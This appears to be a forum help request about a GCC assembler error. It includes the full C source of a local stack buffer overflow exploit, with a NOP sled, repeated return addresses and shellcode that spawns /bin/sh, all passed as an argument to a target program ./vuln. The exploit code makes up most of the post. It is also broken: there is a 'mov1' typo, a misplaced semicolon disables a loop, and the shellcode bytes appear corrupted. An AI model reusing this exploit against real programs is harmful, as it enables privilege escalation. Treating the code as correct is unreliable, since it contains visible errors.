GCC compiling problem C, SuSE 9.1
downloaded the RPM from ftp.suse.com/pub/suse/i386/9.1/suse/i586
You think I need to install more packages? if so, which ones? Or am I just stupid and scan't see something obvious
linux:/home/lxuser/Documents # gcc -o exploit exploit.c
exploit.c:56:2: warning: no newline at end of file
/tmp/cc7LApPc.s: Assembler messages:
/tmp/cc7LApPc.s:16: Error: no such instruction: `mov1 %esp,%eax'
linux:/home/lxuser/Documents #
--------------------------------------------------------------------------------------------------------------
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x86";
unsigned long sp(void)
{ __asm__("mov1 %esp, %eax");}
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; //Use an offset of 0
esp = sp(); //Put the current stack pointer into esp
ret = esp - offset; //We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" offset from esp : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4);
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// end of string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its arguement
execl("./vuln", "vuln", buffer, 0);
//Free the buffer memory
free(buffer);
return 0;
}
--------------------------------------------------------------------------------------------------------------
|